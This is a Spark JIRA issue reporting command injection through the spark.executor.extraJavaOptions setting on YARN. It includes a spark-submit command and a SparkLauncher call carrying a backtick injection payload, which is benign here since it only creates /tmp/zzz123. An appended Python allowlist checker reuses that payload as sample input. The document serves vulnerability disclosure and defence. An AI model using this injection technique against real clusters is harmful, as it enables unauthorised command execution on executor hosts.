Zijie created SPARK-50239:
-----------------------------
Summary: JavaOptions Injection Issue
Key: SPARK-50239
URL: https://issues.apache.org/jira/browse/SPARK-50239
Project: Spark
Issue Type: Improvement
Components: Spark Submit, YARN
Affects Versions: 3.5.1
Reporter: Zijie
* Attack Path
!image-2024-11-06-11-43-13-321.png|width=285,height=315!
* How to attack?
When YARN submits a task, I put a command-injection string in a parameter named
"spark.executor.extraJavaOptions"
!image-2024-11-06-14-35-49-525.png|width=485,height=258!
There are two ways to submit parameters:
# Using the command line: spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
# Using the Java API: sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`");
We may find command-injection logs in Hadoop:
!image-2024-11-06-14-43-46-128.png|width=495,height=298!
*How to exploit?*
!image-2024-11-06-14-46-16-914.png|width=445,height=42!
I found the vulnerability exposed in code:
!image-2024-11-06-14-50-06-477.png|width=535,height=292!
CVSS score:
!image-2024-11-06-14-56-36-042.png|width=562,height=175!
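A pre-submission check for the parameter named in the report, as an added example that is not part of the original issue or of Spark's code. It assumes an allowlist policy for JVM flags and covers only the `--conf` form of spark-submit arguments; the names `check_java_options`, `conf_pairs` and `audit_submit_args` are hypothetical.

```python
import re

# Conf keys checked. The executor key is the one named in the report; the driver
# key is added on the assumption that it deserves the same policy.
JAVA_OPTION_KEYS = ("spark.executor.extraJavaOptions", "spark.driver.extraJavaOptions")

# Assumed policy: each space/tab-separated token must look like a JVM flag
# (-Xmx2g, -XX:+UseG1GC, -Dkey=value). Backticks, $, ;, |, &, quotes, parentheses
# and newlines are outside the allowlist, so shell syntax never passes.
SAFE_TOKEN = re.compile(r"-[A-Za-z0-9_.:=+/,@%-]+")


def check_java_options(value):
    """Return the tokens of a JavaOptions value that fail the allowlist."""
    return [t for t in re.split(r"[ \t]+", value) if t and not SAFE_TOKEN.fullmatch(t)]


def conf_pairs(argv):
    """Yield (key, value) for each '--conf key=value' or '--conf=key=value'."""
    it = iter(argv)
    for arg in it:
        if arg == "--conf":
            arg = next(it, "")
        elif arg.startswith("--conf="):
            arg = arg[len("--conf="):]
        else:
            continue
        key, _, value = arg.partition("=")
        yield key.strip(), value


def audit_submit_args(argv):
    """Map each checked conf key to its rejected tokens (empty dict = accept)."""
    findings = {}
    for key, value in conf_pairs(argv):
        bad = check_java_options(value) if key in JAVA_OPTION_KEYS else []
        if bad:
            findings.setdefault(key, []).extend(bad)
    return findings


# Constructed sample inputs: the argv from the report after the local shell has
# removed the quoting, and a benign submission for comparison.
REPORTED = ["spark-submit", "--class", "JavaWordCount", "--master", "yarn",
            "--deploy-mode", "client", "--conf",
            "spark.executor.extraJavaOptions=`touch$IFS/tmp/zzz123`", "test.jar"]
BENIGN = ["spark-submit", "--master", "yarn", "--conf",
          "spark.executor.extraJavaOptions=-XX:+UseG1GC -Dlog.level=INFO", "test.jar"]
```

A submission gateway would refuse the job whenever `audit_submit_args` returns a non-empty dict; the same `check_java_options` call applies to values passed through `SparkLauncher.setConf`.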